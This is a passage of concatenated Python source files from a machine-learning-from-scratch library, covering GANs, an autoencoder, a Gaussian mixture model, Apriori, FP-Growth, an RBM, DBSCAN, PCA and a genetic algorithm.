1, (half_batch, 100)) # Generate a half batch of images gen_imgs = self.generator.predict(noise) valid = np.concatenate((np.ones((half_batch, 1)), np.zeros((half_batch, 1))), axis=1) fake = np.concatenate((np.zeros((half_batch, 1)), np.ones((half_batch, 1))), axis=1) # Train the discriminator d_loss_real, d_acc_real = self.discriminator.train_on_batch(imgs, valid) d_loss_fake, d_acc_fake = self.discriminator.train_on_batch(gen_imgs, fake) d_loss = 0.5 * (d_loss_real + d_loss_fake) d_acc = 0.5 * (d_acc_real + d_acc_fake) # --------------------- # Train Generator # --------------------- # We only want to train the generator for the combined model self.discriminator.set_trainable(False) # Sample noise and use as generator input noise = np.random.normal(0, 1, (batch_size, self.latent_dim)) # The generator wants the discriminator to label the generated samples as valid valid = np.concatenate((np.ones((batch_size, 1)), np.zeros((batch_size, 1))), axis=1) # Train the generator g_loss, g_acc = self.combined.train_on_batch(noise, valid) # Display the progress print ("%d [D loss: %f, acc: %.2f%%] [G loss: %f, acc: %.2f%%]" % (epoch, d_loss, 100*d_acc, g_loss, 100*g_acc)) # If at save interval => save generated image samples if epoch % save_interval == 0: self.save_imgs(epoch) def save_imgs(self, epoch): r, c = 5, 5 noise = np.random.normal(0, 1, (r * c, 100)) gen_imgs = self.generator.predict(noise) # Rescale images 0 - 1 (from -1 to 1) gen_imgs = 0.5 * (gen_imgs + 1) fig, axs = plt.subplots(r, c) plt.suptitle("Deep Convolutional Generative Adversarial Network") cnt = 0 for i in range(r): for j in range(c): axs[i,j].imshow(gen_imgs[cnt,0,:,:], cmap='gray') axs[i,j].axis('off') cnt += 1 fig.savefig("mnist_%d.png" % epoch) plt.close() if __name__ == '__main__': dcgan = DCGAN() dcgan.train(epochs=200000, batch_size=64, save_interval=50) File: mlfromscratch/unsupervised_learning/gaussian_mixture_model.py from __future__ import division, print_function import math from sklearn import datasets import numpy as np from mlfromscratch.utils import normalize, euclidean_distance, calculate_covariance_matrix from mlfromscratch.utils import Plot class GaussianMixtureModel(): """A probabilistic clustering method for determining groupings among data samples. Parameters: ----------- k: int The number of clusters the algorithm will form. max_iterations: int The number of iterations the algorithm will run for if it does not converge before that. tolerance: float If the difference of the results from one iteration to the next is smaller than this value we will say that the algorithm has converged. 
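    Example (an illustrative sketch; the synthetic two-blob data below is assumed):

        import numpy as np
        X = np.vstack([np.random.randn(60, 2), np.random.randn(60, 2) + 4])
        assignments = GaussianMixtureModel(k=2, max_iterations=200).predict(X)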
""" def __init__(self, k=2, max_iterations=2000, tolerance=1e-8): self.k = k self.parameters = [] self.max_iterations = max_iterations self.tolerance = tolerance self.responsibilities = [] self.sample_assignments = None self.responsibility = None def _init_random_gaussians(self, X): """ Initialize gaussian randomly """ n_samples = np.shape(X)[0] self.priors = (1 / self.k) * np.ones(self.k) for i in range(self.k): params = {} params["mean"] = X[np.random.choice(range(n_samples))] params["cov"] = calculate_covariance_matrix(X) self.parameters.append(params) def multivariate_gaussian(self, X, params): """ Likelihood """ n_features = np.shape(X)[1] mean = params["mean"] covar = params["cov"] determinant = np.linalg.det(covar) likelihoods = np.zeros(np.shape(X)[0]) for i, sample in enumerate(X): d = n_features # dimension coeff = (1.0 / (math.pow((2.0 * math.pi), d / 2) * math.sqrt(determinant))) exponent = math.exp(-0.5 * (sample - mean).T.dot(np.linalg.pinv(covar)).dot((sample - mean))) likelihoods[i] = coeff * exponent return likelihoods def _get_likelihoods(self, X): """ Calculate the likelihood over all samples """ n_samples = np.shape(X)[0] likelihoods = np.zeros((n_samples, self.k)) for i in range(self.k): likelihoods[ :, i] = self.multivariate_gaussian( X, self.parameters[i]) return likelihoods def _expectation(self, X): """ Calculate the responsibility """ # Calculate probabilities of X belonging to the different clusters weighted_likelihoods = self._get_likelihoods(X) * self.priors sum_likelihoods = np.expand_dims( np.sum(weighted_likelihoods, axis=1), axis=1) # Determine responsibility as P(X|y)*P(y)/P(X) self.responsibility = weighted_likelihoods / sum_likelihoods # Assign samples to cluster that has largest probability self.sample_assignments = self.responsibility.argmax(axis=1) # Save value for convergence check self.responsibilities.append(np.max(self.responsibility, axis=1)) def _maximization(self, X): """ Update the parameters and priors """ # Iterate through clusters and recalculate mean and covariance for i in range(self.k): resp = np.expand_dims(self.responsibility[:, i], axis=1) mean = (resp * X).sum(axis=0) / resp.sum() covariance = (X - mean).T.dot((X - mean) * resp) / resp.sum() self.parameters[i]["mean"], self.parameters[ i]["cov"] = mean, covariance # Update weights n_samples = np.shape(X)[0] self.priors = self.responsibility.sum(axis=0) / n_samples def _converged(self, X): """ Covergence if || likehood - last_likelihood || < tolerance """ if len(self.responsibilities) < 2: return False diff = np.linalg.norm( self.responsibilities[-1] - self.responsibilities[-2]) # print ("Likelihood update: %s (tol: %s)" % (diff, self.tolerance)) return diff <= self.tolerance def predict(self, X): """ Run GMM and return the cluster indices """ # Initialize the gaussians randomly self._init_random_gaussians(X) # Run EM until convergence or for max iterations for _ in range(self.max_iterations): self._expectation(X) # E-step self._maximization(X) # M-step # Check convergence if self._converged(X): break # Make new assignments and return them self._expectation(X) return self.sample_assignments File: mlfromscratch/unsupervised_learning/autoencoder.py from __future__ import print_function, division from sklearn import datasets import math import matplotlib.pyplot as plt import numpy as np import progressbar from sklearn.datasets import fetch_mldata from mlfromscratch.deep_learning.optimizers import Adam from mlfromscratch.deep_learning.loss_functions import CrossEntropy, SquareLoss from 
mlfromscratch.deep_learning.layers import Dense, Dropout, Flatten, Activation, Reshape, BatchNormalization from mlfromscratch.deep_learning import NeuralNetwork class Autoencoder(): """An Autoencoder with deep fully-connected neural nets. Training Data: MNIST Handwritten Digits (28x28 images) """ def __init__(self): self.img_rows = 28 self.img_cols = 28 self.img_dim = self.img_rows * self.img_cols self.latent_dim = 128 # The dimension of the data embedding optimizer = Adam(learning_rate=0.0002, b1=0.5) loss_function = SquareLoss self.encoder = self.build_encoder(optimizer, loss_function) self.decoder = self.build_decoder(optimizer, loss_function) self.autoencoder = NeuralNetwork(optimizer=optimizer, loss=loss_function) self.autoencoder.layers.extend(self.encoder.layers) self.autoencoder.layers.extend(self.decoder.layers) print () self.autoencoder.summary(name="Variational Autoencoder") def build_encoder(self, optimizer, loss_function): encoder = NeuralNetwork(optimizer=optimizer, loss=loss_function) encoder.add(Dense(512, input_shape=(self.img_dim,))) encoder.add(Activation('leaky_relu')) encoder.add(BatchNormalization(momentum=0.8)) encoder.add(Dense(256)) encoder.add(Activation('leaky_relu')) encoder.add(BatchNormalization(momentum=0.8)) encoder.add(Dense(self.latent_dim)) return encoder def build_decoder(self, optimizer, loss_function): decoder = NeuralNetwork(optimizer=optimizer, loss=loss_function) decoder.add(Dense(256, input_shape=(self.latent_dim,))) decoder.add(Activation('leaky_relu')) decoder.add(BatchNormalization(momentum=0.8)) decoder.add(Dense(512)) decoder.add(Activation('leaky_relu')) decoder.add(BatchNormalization(momentum=0.8)) decoder.add(Dense(self.img_dim)) decoder.add(Activation('tanh')) return decoder def train(self, n_epochs, batch_size=128, save_interval=50): mnist = fetch_mldata('MNIST original') X = mnist.data y = mnist.target # Rescale [-1, 1] X = (X.astype(np.float32) - 127.5) / 127.5 for epoch in range(n_epochs): # Select a random half batch of images idx = np.random.randint(0, X.shape[0], batch_size) imgs = X[idx] # Train the Autoencoder loss, _ = self.autoencoder.train_on_batch(imgs, imgs) # Display the progress print ("%d [D loss: %f]" % (epoch, loss)) # If at save interval => save generated image samples if epoch % save_interval == 0: self.save_imgs(epoch, X) def save_imgs(self, epoch, X): r, c = 5, 5 # Grid size # Select a random half batch of images idx = np.random.randint(0, X.shape[0], r*c) imgs = X[idx] # Generate images and reshape to image shape gen_imgs = self.autoencoder.predict(imgs).reshape((-1, self.img_rows, self.img_cols)) # Rescale images 0 - 1 gen_imgs = 0.5 * gen_imgs + 0.5 fig, axs = plt.subplots(r, c) plt.suptitle("Autoencoder") cnt = 0 for i in range(r): for j in range(c): axs[i,j].imshow(gen_imgs[cnt,:,:], cmap='gray') axs[i,j].axis('off') cnt += 1 fig.savefig("ae_%d.png" % epoch) plt.close() if __name__ == '__main__': ae = Autoencoder() ae.train(n_epochs=200000, batch_size=64, save_interval=400) File: mlfromscratch/unsupervised_learning/apriori.py from __future__ import division, print_function import numpy as np import itertools class Rule(): def __init__(self, antecedent, concequent, confidence, support): self.antecedent = antecedent self.concequent = concequent self.confidence = confidence self.support = support class Apriori(): """A method for determining frequent itemsets in a transactional database and also for generating rules for those itemsets. 
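    Example (an illustrative sketch; the small integer-encoded transaction
    list below is assumed):

        transactions = [[1, 2, 3], [1, 2], [2, 3], [1, 2, 4]]
        rules = Apriori(min_sup=0.5, min_conf=0.8).generate_rules(transactions)
        # each rule exposes .antecedent, .concequent, .confidence and .support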
Parameters: ----------- min_sup: float The minimum fraction of transactions an itemets needs to occur in to be deemed frequent min_conf: float: The minimum fraction of times the antecedent needs to imply the concequent to justify rule """ def __init__(self, min_sup=0.3, min_conf=0.81): self.min_sup = min_sup self.min_conf = min_conf self.freq_itemsets = None # List of freqeuent itemsets self.transactions = None # List of transactions def _calculate_support(self, itemset): count = 0 for transaction in self.transactions: if self._transaction_contains_items(transaction, itemset): count += 1 support = count / len(self.transactions) return support def _get_frequent_itemsets(self, candidates): """ Prunes the candidates that are not frequent => returns list with only frequent itemsets """ frequent = [] # Find frequent items for itemset in candidates: support = self._calculate_support(itemset) if support >= self.min_sup: frequent.append(itemset) return frequent def _has_infrequent_itemsets(self, candidate): """ True or false depending on the candidate has any subset with size k - 1 that is not in the frequent itemset """ k = len(candidate) # Find all combinations of size k-1 in candidate # E.g [1,2,3] => [[1,2],[1,3],[2,3]] subsets = list(itertools.combinations(candidate, k - 1)) for t in subsets: # t - is tuple. If size == 1 get the element subset = list(t) if len(t) > 1 else t[0] if not subset in self.freq_itemsets[-1]: return True return False def _generate_candidates(self, freq_itemset): """ Joins the elements in the frequent itemset and prunes resulting sets if they contain subsets that have been determined to be infrequent. """ candidates = [] for itemset1 in freq_itemset: for itemset2 in freq_itemset: # Valid if every element but the last are the same # and the last element in itemset1 is smaller than the last # in itemset2 valid = False single_item = isinstance(itemset1, int) if single_item and itemset1 < itemset2: valid = True elif not single_item and np.array_equal(itemset1[:-1], itemset2[:-1]) and itemset1[-1] < itemset2[-1]: valid = True if valid: # JOIN: Add the last element in itemset2 to itemset1 to # create a new candidate if single_item: candidate = [itemset1, itemset2] else: candidate = itemset1 + [itemset2[-1]] # PRUNE: Check if any subset of candidate have been determined # to be infrequent infrequent = self._has_infrequent_itemsets(candidate) if not infrequent: candidates.append(candidate) return candidates def _transaction_contains_items(self, transaction, items): """ True or false depending on each item in the itemset is in the transaction """ # If items is in fact only one item if isinstance(items, int): return items in transaction # Iterate through list of items and make sure that # all items are in the transaction for item in items: if not item in transaction: return False return True def find_frequent_itemsets(self, transactions): """ Returns the set of frequent itemsets in the list of transactions """ self.transactions = transactions # Get all unique items in the transactions unique_items = set(item for transaction in self.transactions for item in transaction) # Get the frequent items self.freq_itemsets = [self._get_frequent_itemsets(unique_items)] while(True): # Generate new candidates from last added frequent itemsets candidates = self._generate_candidates(self.freq_itemsets[-1]) # Get the frequent itemsets among those candidates frequent_itemsets = self._get_frequent_itemsets(candidates) # If there are no frequent itemsets we're done if not frequent_itemsets: break # 
Add them to the total list of frequent itemsets and start over self.freq_itemsets.append(frequent_itemsets) # Flatten the array and return every frequent itemset frequent_itemsets = [ itemset for sublist in self.freq_itemsets for itemset in sublist] return frequent_itemsets def _rules_from_itemset(self, initial_itemset, itemset): """ Recursive function which returns the rules where confidence >= min_confidence Starts with large itemset and recursively explores rules for subsets """ rules = [] k = len(itemset) # Get all combinations of sub-itemsets of size k - 1 from itemset # E.g [1,2,3] => [[1,2],[1,3],[2,3]] subsets = list(itertools.combinations(itemset, k - 1)) support = self._calculate_support(initial_itemset) for antecedent in subsets: # itertools.combinations returns tuples => convert to list antecedent = list(antecedent) antecedent_support = self._calculate_support(antecedent) # Calculate the confidence as sup(A and B) / sup(B), if antecedent # is B in an itemset of A and B confidence = float("{0:.2f}".format(support / antecedent_support)) if confidence >= self.min_conf: # The concequent is the initial_itemset except for antecedent concequent = [itemset for itemset in initial_itemset if not itemset in antecedent] # If single item => get item if len(antecedent) == 1: antecedent = antecedent[0] if len(concequent) == 1: concequent = concequent[0] # Create new rule rule = Rule( antecedent=antecedent, concequent=concequent, confidence=confidence, support=support) rules.append(rule) # If there are subsets that could result in rules # recursively add rules from subsets if k - 1 > 1: rules += self._rules_from_itemset(initial_itemset, antecedent) return rules def generate_rules(self, transactions): self.transactions = transactions frequent_itemsets = self.find_frequent_itemsets(transactions) # Only consider itemsets of size >= 2 items frequent_itemsets = [itemset for itemset in frequent_itemsets if not isinstance( itemset, int)] rules = [] for itemset in frequent_itemsets: rules += self._rules_from_itemset(itemset, itemset) # Remove empty values return rules File: mlfromscratch/unsupervised_learning/generative_adversarial_network.py from __future__ import print_function, division from sklearn import datasets import math import matplotlib.pyplot as plt import numpy as np import progressbar from sklearn.datasets import fetch_mldata from mlfromscratch.deep_learning.optimizers import Adam from mlfromscratch.deep_learning.loss_functions import CrossEntropy from mlfromscratch.deep_learning.layers import Dense, Dropout, Flatten, Activation, Reshape, BatchNormalization from mlfromscratch.deep_learning import NeuralNetwork class GAN(): """A Generative Adversarial Network with deep fully-connected neural nets as Generator and Discriminator. 
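    Example (an illustrative sketch; small values are assumed, and train()
    relies on sklearn's fetch_mldata MNIST download being available):

        gan = GAN()
        gan.train(n_epochs=1000, batch_size=64, save_interval=200)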
Training Data: MNIST Handwritten Digits (28x28 images) """ def __init__(self): self.img_rows = 28 self.img_cols = 28 self.img_dim = self.img_rows * self.img_cols self.latent_dim = 100 optimizer = Adam(learning_rate=0.0002, b1=0.5) loss_function = CrossEntropy # Build the discriminator self.discriminator = self.build_discriminator(optimizer, loss_function) # Build the generator self.generator = self.build_generator(optimizer, loss_function) # Build the combined model self.combined = NeuralNetwork(optimizer=optimizer, loss=loss_function) self.combined.layers.extend(self.generator.layers) self.combined.layers.extend(self.discriminator.layers) print () self.generator.summary(name="Generator") self.discriminator.summary(name="Discriminator") def build_generator(self, optimizer, loss_function): model = NeuralNetwork(optimizer=optimizer, loss=loss_function) model.add(Dense(256, input_shape=(self.latent_dim,))) model.add(Activation('leaky_relu')) model.add(BatchNormalization(momentum=0.8)) model.add(Dense(512)) model.add(Activation('leaky_relu')) model.add(BatchNormalization(momentum=0.8)) model.add(Dense(1024)) model.add(Activation('leaky_relu')) model.add(BatchNormalization(momentum=0.8)) model.add(Dense(self.img_dim)) model.add(Activation('tanh')) return model def build_discriminator(self, optimizer, loss_function): model = NeuralNetwork(optimizer=optimizer, loss=loss_function) model.add(Dense(512, input_shape=(self.img_dim,))) model.add(Activation('leaky_relu')) model.add(Dropout(0.5)) model.add(Dense(256)) model.add(Activation('leaky_relu')) model.add(Dropout(0.5)) model.add(Dense(2)) model.add(Activation('softmax')) return model def train(self, n_epochs, batch_size=128, save_interval=50): mnist = fetch_mldata('MNIST original') X = mnist.data y = mnist.target # Rescale [-1, 1] X = (X.astype(np.float32) - 127.5) / 127.5 half_batch = int(batch_size / 2) for epoch in range(n_epochs): # --------------------- # Train Discriminator # --------------------- self.discriminator.set_trainable(True) # Select a random half batch of images idx = np.random.randint(0, X.shape[0], half_batch) imgs = X[idx] # Sample noise to use as generator input noise = np.random.normal(0, 1, (half_batch, self.latent_dim)) # Generate a half batch of images gen_imgs = self.generator.predict(noise) # Valid = [1, 0], Fake = [0, 1] valid = np.concatenate((np.ones((half_batch, 1)), np.zeros((half_batch, 1))), axis=1) fake = np.concatenate((np.zeros((half_batch, 1)), np.ones((half_batch, 1))), axis=1) # Train the discriminator d_loss_real, d_acc_real = self.discriminator.train_on_batch(imgs, valid) d_loss_fake, d_acc_fake = self.discriminator.train_on_batch(gen_imgs, fake) d_loss = 0.5 * (d_loss_real + d_loss_fake) d_acc = 0.5 * (d_acc_real + d_acc_fake) # --------------------- # Train Generator # --------------------- # We only want to train the generator for the combined model self.discriminator.set_trainable(False) # Sample noise and use as generator input noise = np.random.normal(0, 1, (batch_size, self.latent_dim)) # The generator wants the discriminator to label the generated samples as valid valid = np.concatenate((np.ones((batch_size, 1)), np.zeros((batch_size, 1))), axis=1) # Train the generator g_loss, g_acc = self.combined.train_on_batch(noise, valid) # Display the progress print ("%d [D loss: %f, acc: %.2f%%] [G loss: %f, acc: %.2f%%]" % (epoch, d_loss, 100*d_acc, g_loss, 100*g_acc)) # If at save interval => save generated image samples if epoch % save_interval == 0: self.save_imgs(epoch) def save_imgs(self, epoch): r, 
c = 5, 5 # Grid size noise = np.random.normal(0, 1, (r * c, self.latent_dim)) # Generate images and reshape to image shape gen_imgs = self.generator.predict(noise).reshape((-1, self.img_rows, self.img_cols)) # Rescale images 0 - 1 gen_imgs = 0.5 * gen_imgs + 0.5 fig, axs = plt.subplots(r, c) plt.suptitle("Generative Adversarial Network") cnt = 0 for i in range(r): for j in range(c): axs[i,j].imshow(gen_imgs[cnt,:,:], cmap='gray') axs[i,j].axis('off') cnt += 1 fig.savefig("mnist_%d.png" % epoch) plt.close() if __name__ == '__main__': gan = GAN() gan.train(n_epochs=200000, batch_size=64, save_interval=400) File: mlfromscratch/unsupervised_learning/restricted_boltzmann_machine.py import logging import numpy as np import progressbar from mlfromscratch.utils.misc import bar_widgets from mlfromscratch.utils import batch_iterator from mlfromscratch.deep_learning.activation_functions import Sigmoid sigmoid = Sigmoid() class RBM(): """Bernoulli Restricted Boltzmann Machine (RBM) Parameters: ----------- n_hidden: int: The number of processing nodes (neurons) in the hidden layer. learning_rate: float The step length that will be used when updating the weights. batch_size: int The size of the mini-batch used to calculate each weight update. n_iterations: float The number of training iterations the algorithm will tune the weights for. Reference: A Practical Guide to Training Restricted Boltzmann Machines URL: https://www.cs.toronto.edu/~hinton/absps/guideTR.pdf """ def __init__(self, n_hidden=128, learning_rate=0.1, batch_size=10, n_iterations=100): self.n_iterations = n_iterations self.batch_size = batch_size self.lr = learning_rate self.n_hidden = n_hidden self.progressbar = progressbar.ProgressBar(widgets=bar_widgets) def _initialize_weights(self, X): n_visible = X.shape[1] self.W = np.random.normal(scale=0.1, size=(n_visible, self.n_hidden)) self.v0 = np.zeros(n_visible) # Bias visible self.h0 = np.zeros(self.n_hidden) # Bias hidden def fit(self, X, y=None): '''Contrastive Divergence training procedure''' self._initialize_weights(X) self.training_errors = [] self.training_reconstructions = [] for _ in self.progressbar(range(self.n_iterations)): batch_errors = [] for batch in batch_iterator(X, batch_size=self.batch_size): # Positive phase positive_hidden = sigmoid(batch.dot(self.W) + self.h0) hidden_states = self._sample(positive_hidden) positive_associations = batch.T.dot(positive_hidden) # Negative phase negative_visible = sigmoid(hidden_states.dot(self.W.T) + self.v0) negative_visible = self._sample(negative_visible) negative_hidden = sigmoid(negative_visible.dot(self.W) + self.h0) negative_associations = negative_visible.T.dot(negative_hidden) self.W += self.lr * (positive_associations - negative_associations) self.h0 += self.lr * (positive_hidden.sum(axis=0) - negative_hidden.sum(axis=0)) self.v0 += self.lr * (batch.sum(axis=0) - negative_visible.sum(axis=0)) batch_errors.append(np.mean((batch - negative_visible) ** 2)) self.training_errors.append(np.mean(batch_errors)) # Reconstruct a batch of images from the training set idx = np.random.choice(range(X.shape[0]), self.batch_size) self.training_reconstructions.append(self.reconstruct(X[idx])) def _sample(self, X): return X > np.random.random_sample(size=X.shape) def reconstruct(self, X): positive_hidden = sigmoid(X.dot(self.W) + self.h0) hidden_states = self._sample(positive_hidden) negative_visible = sigmoid(hidden_states.dot(self.W.T) + self.v0) return negative_visible File: mlfromscratch/unsupervised_learning/dbscan.py from __future__ import 
print_function, division import numpy as np from mlfromscratch.utils import Plot, euclidean_distance, normalize class DBSCAN(): """A density based clustering method that expands clusters from samples that have more neighbors within a radius specified by eps than the value min_samples. Parameters: ----------- eps: float The radius within which samples are considered neighbors min_samples: int The number of neighbors required for the sample to be a core point. """ def __init__(self, eps=1, min_samples=5): self.eps = eps self.min_samples = min_samples def _get_neighbors(self, sample_i): """ Return a list of indexes of neighboring samples A sample_2 is considered a neighbor of sample_1 if the distance between them is smaller than epsilon """ neighbors = [] idxs = np.arange(len(self.X)) for i, _sample in enumerate(self.X[idxs != sample_i]): distance = euclidean_distance(self.X[sample_i], _sample) if distance < self.eps: neighbors.append(i) return np.array(neighbors) def _expand_cluster(self, sample_i, neighbors): """ Recursive method which expands the cluster until we have reached the border of the dense area (density determined by eps and min_samples) """ cluster = [sample_i] # Iterate through neighbors for neighbor_i in neighbors: if not neighbor_i in self.visited_samples: self.visited_samples.append(neighbor_i) # Fetch the sample's distant neighbors (neighbors of neighbor) self.neighbors[neighbor_i] = self._get_neighbors(neighbor_i) # Make sure the neighbor's neighbors are more than min_samples # (If this is true the neighbor is a core point) if len(self.neighbors[neighbor_i]) >= self.min_samples: # Expand the cluster from the neighbor expanded_cluster = self._expand_cluster( neighbor_i, self.neighbors[neighbor_i]) # Add expanded cluster to this cluster cluster = cluster + expanded_cluster else: # If the neighbor is not a core point we only add the neighbor point cluster.append(neighbor_i) return cluster def _get_cluster_labels(self): """ Return the samples labels as the index of the cluster in which they are contained """ # Set default value to number of clusters # Will make sure all outliers have same cluster label labels = np.full(shape=self.X.shape[0], fill_value=len(self.clusters)) for cluster_i, cluster in enumerate(self.clusters): for sample_i in cluster: labels[sample_i] = cluster_i return labels # DBSCAN def predict(self, X): self.X = X self.clusters = [] self.visited_samples = [] self.neighbors = {} n_samples = np.shape(self.X)[0] # Iterate through samples and expand clusters from them # if they have more neighbors than self.min_samples for sample_i in range(n_samples): if sample_i in self.visited_samples: continue self.neighbors[sample_i] = self._get_neighbors(sample_i) if len(self.neighbors[sample_i]) >= self.min_samples: # If core point => mark as visited self.visited_samples.append(sample_i) # Sample has more neighbors than self.min_samples => expand # cluster from sample new_cluster = self._expand_cluster( sample_i, self.neighbors[sample_i]) # Add cluster to list of clusters self.clusters.append(new_cluster) # Get the resulting cluster labels cluster_labels = self._get_cluster_labels() return cluster_labels File: mlfromscratch/unsupervised_learning/principal_component_analysis.py from __future__ import print_function, division import numpy as np from mlfromscratch.utils import calculate_covariance_matrix class PCA(): """A method for doing dimensionality reduction by transforming the feature space to a lower dimensionality, removing correlation between features and maximizing 
the variance along each feature axis. This class is also used throughout the project to plot data. """ def transform(self, X, n_components): """ Fit the dataset to the number of principal components specified in the constructor and return the transformed dataset """ covariance_matrix = calculate_covariance_matrix(X) # Where (eigenvector[:,0] corresponds to eigenvalue[0]) eigenvalues, eigenvectors = np.linalg.eig(covariance_matrix) # Sort the eigenvalues and corresponding eigenvectors from largest # to smallest eigenvalue and select the first n_components idx = eigenvalues.argsort()[::-1] eigenvalues = eigenvalues[idx][:n_components] eigenvectors = np.atleast_1d(eigenvectors[:, idx])[:, :n_components] # Project the data onto principal components X_transformed = X.dot(eigenvectors) return X_transformed File: mlfromscratch/unsupervised_learning/fp_growth.py from __future__ import division, print_function import numpy as np import itertools class FPTreeNode(): def __init__(self, item=None, support=1): # 'Value' of the item self.item = item # Number of times the item occurs in a # transaction self.support = support # Child nodes in the FP Growth Tree self.children = {} class FPGrowth(): """A method for determining frequent itemsets in a transactional database. This is done by building a so called FP Growth tree, which can then be mined to collect the frequent itemsets. More effective than Apriori for large transactional databases. Parameters: ----------- min_sup: float The minimum fraction of transactions an itemets needs to occur in to be deemed frequent """ def __init__(self, min_sup=0.3): self.min_sup = min_sup # The root of the initial FP Growth Tree self.tree_root = None # Prefixes of itemsets in the FP Growth Tree self.prefixes = {} self.frequent_itemsets = [] # Count the number of transactions that contains item. def _calculate_support(self, item, transactions): count = 0 for transaction in transactions: if item in transaction: count += 1 support = count return support def _get_frequent_items(self, transactions): """ Returns a set of frequent items. An item is determined to be frequent if there are atleast min_sup transactions that contains it. """ # Get all unique items in the transactions unique_items = set( item for transaction in transactions for item in transaction) items = [] for item in unique_items: sup = self._calculate_support(item, transactions) if sup >= self.min_sup: items.append([item, sup]) # Sort by support - Highest to lowest items.sort(key=lambda item: item[1], reverse=True) frequent_items = [[el[0]] for el in items] # Only return the items return frequent_items def _insert_tree(self, node, children): """ Recursive method which adds nodes to the tree. 
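        For example (illustrative): _insert_tree(root, ['a', 'b']) creates or
        reuses the path root -> 'a' -> 'b', incrementing the support count of
        any node that already exists along that path.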
""" if not children: return # Create new node as the first item in children list child_item = children[0] child = FPTreeNode(item=child_item) # If parent already contains item => increase the support if child_item in node.children: node.children[child.item].support += 1 else: node.children[child.item] = child # Execute _insert_tree on the rest of the children list # from the new node self._insert_tree(node.children[child.item], children[1:]) def _construct_tree(self, transactions, frequent_items=None): if not frequent_items: # Get frequent items sorted by support frequent_items = self._get_frequent_items(transactions) unique_frequent_items = list( set(item for itemset in frequent_items for item in itemset)) # Construct the root of the FP Growth tree root = FPTreeNode() for transaction in transactions: # Remove items that are not frequent according to # unique_frequent_items transaction = [item for item in transaction if item in unique_frequent_items] transaction.sort(key=lambda item: frequent_items.index([item])) self._insert_tree(root, transaction) return root def print_tree(self, node=None, indent_times=0): """ Recursive method which prints the FP Growth Tree """ if not node: node = self.tree_root indent = " " * indent_times print ("%s%s:%s" % (indent, node.item, node.support)) for child_key in node.children: child = node.children[child_key] self.print_tree(child, indent_times + 1) def _is_prefix(self, itemset, node): """ Makes sure that the first item in itemset is a child of node and that every following item in itemset is reachable via that path """ for item in itemset: if not item in node.children: return False node = node.children[item] return True def _determine_prefixes(self, itemset, node, prefixes=None): """ Recursive method that adds prefixes to the itemset by traversing the FP Growth Tree""" if not prefixes: prefixes = [] # If the current node is a prefix to the itemset # add the current prefixes value as prefix to the itemset if self._is_prefix(itemset, node): itemset_key = self._get_itemset_key(itemset) if not itemset_key in self.prefixes: self.prefixes[itemset_key] = [] self.prefixes[itemset_key] += [{"prefix": prefixes, "support": node.children[itemset[0]].support}] for child_key in node.children: child = node.children[child_key] # Recursive call with child as new node. Add the child item as potential # prefix. self._determine_prefixes(itemset, child, prefixes + [child.item]) def _get_itemset_key(self, itemset): """ Determines the look of the hashmap key for self.prefixes List of more strings than one gets joined by '-' """ if len(itemset) > 1: itemset_key = "-".join(itemset) else: itemset_key = str(itemset[0]) return itemset_key def _determine_frequent_itemsets(self, conditional_database, suffix): # Calculate new frequent items from the conditional database # of suffix frequent_items = self._get_frequent_items(conditional_database) cond_tree = None if suffix: cond_tree = self._construct_tree(conditional_database, frequent_items) # Output new frequent itemset as the suffix added to the frequent # items self.frequent_itemsets += [el + suffix for el in frequent_items] # Find larger frequent itemset by finding prefixes # of the frequent items in the FP Growth Tree for the conditional # database. 
self.prefixes = {} for itemset in frequent_items: # If no suffix (first run) if not cond_tree: cond_tree = self.tree_root # Determine prefixes to itemset self._determine_prefixes(itemset, cond_tree) conditional_database = [] itemset_key = self._get_itemset_key(itemset) # Build new conditional database if itemset_key in self.prefixes: for el in self.prefixes[itemset_key]: # If support = 4 => add 4 of the corresponding prefix set for _ in range(el["support"]): conditional_database.append(el["prefix"]) # Create new suffix new_suffix = itemset + suffix if suffix else itemset self._determine_frequent_itemsets(conditional_database, suffix=new_suffix) def find_frequent_itemsets(self, transactions, suffix=None, show_tree=False): self.transactions = transactions # Build the FP Growth Tree self.tree_root = self._construct_tree(transactions) if show_tree: print ("FP-Growth Tree:") self.print_tree(self.tree_root) self._determine_frequent_itemsets(transactions, suffix=None) return self.frequent_itemsets File: mlfromscratch/unsupervised_learning/genetic_algorithm.py from __future__ import print_function, division import string import numpy as np class GeneticAlgorithm(): """An implementation of a Genetic Algorithm which will try to produce the user specified target string. Parameters: ----------- target_string: string The string which the GA should try to produce. population_size: int The number of individuals (possible solutions) in the population. mutation_rate: float The rate (or probability) of which the alleles (chars in this case) should be randomly changed. """ def __init__(self, target_string, population_size, mutation_rate): self.target = target_string self.population_size = population_size self.mutation_rate = mutation_rate self.letters = [" "] + list(string.ascii_letters) def _initialize(self): """ Initialize population with random strings """ self.population = [] for _ in range(self.population_size): # Select random letters as new individual individual = "".join(np.random.choice(self.letters, size=len(self.target))) self.population.append(individual) def _calculate_fitness(self): """ Calculates the fitness of each individual in the population """ population_fitness = [] for individual in self.population: # Calculate loss as the alphabetical distance between # the characters in the individual and the target string loss = 0 for i in range(len(individual)): letter_i1 = self.letters.index(individual[i]) letter_i2 = self.letters.index(self.target[i]) loss += abs(letter_i1 - letter_i2) fitness = 1 / (loss + 1e-6) population_fitness.append(fitness) return population_fitness def _mutate(self, individual): """ Randomly change the individual's characters with probability self.mutation_rate """ individual = list(individual) for j in range(len(individual)): # Make change with probability mutation_rate if np.random.random() < self.mutation_rate: individual[j] = np.random.choice(self.letters) # Return mutated individual as string return "".join(individual) def _crossover(self, parent1, parent2): """ Create children from parents by crossover """ # Select random crossover point cross_i = np.random.randint(0, len(parent1)) child1 = parent1[:cross_i] + parent2[cross_i:] child2 = parent2[:cross_i] + parent1[cross_i:] return child1, child2 def run(self, iterations): # Initialize new population self._initialize() for epoch in range(iterations): population_fitness = self._calculate_fitness() fittest_individual = self.population[np.argmax(population_fitness)] highest_fitness = max(population_fitness) # If we have 
